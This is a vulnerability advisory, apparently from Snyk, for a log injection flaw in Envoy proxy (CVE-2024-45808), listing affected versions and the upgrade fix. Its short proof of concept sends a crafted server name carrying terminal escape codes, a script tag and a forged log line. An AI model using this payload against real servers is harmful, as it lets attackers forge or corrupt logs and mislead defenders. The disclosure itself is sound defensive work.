Improper Output Neutralization for Logs Affecting envoyproxy/envoy package, versions [,1.28.7) [1.29.0,1.29.9) [1.30.0,1.30.6) [1.31.0,1.31.2)
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.05% (19th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-UNMANAGED-ENVOYPROXYENVOY-8062355
- published 20 Sep 2024
- disclosed 20 Sep 2024
- credit John Howard
Introduced: 20 Sep 2024
CVE-2024-45808 Open this link in a new tabHow to fix?
Upgrade envoyproxy/envoy to version 1.28.7, 1.29.9, 1.30.6, 1.31.2 or higher.
Overview
Affected versions of this package are vulnerable to Improper Output Neutralization for Logs due to the lack of validation for the REQUESTED_SERVER_NAME field for access loggers. An attacker can inject unexpected content into access logs by exploiting this vulnerability.
PoC
blue='\e[0;34m'
x=$(echo -e $blue)
client https://10.36.1.114/ --server-name "[foo.com](http://foo.com/)${x}this is blue
end<script>alert()</script>
[2022-01-05T17:14:26.823Z] fake log"